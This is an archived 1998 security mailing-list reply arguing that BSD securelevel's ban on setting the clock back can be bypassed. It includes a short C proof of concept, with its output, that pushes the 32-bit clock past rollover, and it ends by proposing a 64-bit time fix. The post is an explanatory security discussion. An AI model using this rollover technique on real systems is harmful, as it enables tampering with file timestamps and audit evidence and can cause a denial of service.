Re: Security Hole in Axent ESM

From: Andy Church (achurchat_private)
Date: Sat Aug 29 1998 - 22:01:12 PDT

    [stuff about setting file timestamps]
    >This is why BSD/OS since version 3.0 disallows setting the clock
    >backwards when running at normal securelevel. I think more operating
    >systems need that feature. Subverting timestamps in this environments
    >becomes much harder.

         Not really.  Granted, the following is from a Linux box, not a
    secureleveled BSD one, but it illustrates the principle:

    -=-=-=-=-=-=-=-
    crystal:/tmp# cat settime.c
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/time.h>

    int main()
    {
            struct timeval tv, now;

            gettimeofday(&now, NULL);
            tv.tv_sec = 0x7FFFFFF8;
            tv.tv_usec = 0;
            settimeofday(&tv, NULL);
            system("date");
            sleep(15);
            system("date");
            now.tv_sec += 14;       /* less than we slept for */
            settimeofday(&now, NULL);
            system("date");
            return 0;
    }
    crystal:/tmp# cc settime.c -o settime
    crystal:/tmp# ./settime
    Mon Jan 18 22:14:00 EST 2038
    Fri Dec 13 15:45:59 EST 1901
    Sun Aug 30 00:39:14 EDT 1998
    crystal:/tmp#
    -=-=-=-=-=-=-=-

         In other words, if you can't manually set the clock back, get the
    system to do it for you.  And if the system doesn't allow the clock to
    "turn over", then all sorts of things will go bonkers when the clock hits
    its maximum (cron jobs, for one), turning this into a DoS of sorts.  So I
    don't see this as a particularly effective measure.  One way I could see to
    make this more effective would be to use 64-bit times and disallow both
    setting the clock back and changing the top 2 bits to anything other than
    zero.  This would break the rollover attack without causing any premature
    Y2k-like problems (2^62 seconds ~= 10^13 years).

      --Andy Church                  | If Bell Atlantic really is the heart
        achurchat_private       | of communication, then it desperately
        www.dragonfire.net/~achurch/ | needs a quadruple bypass.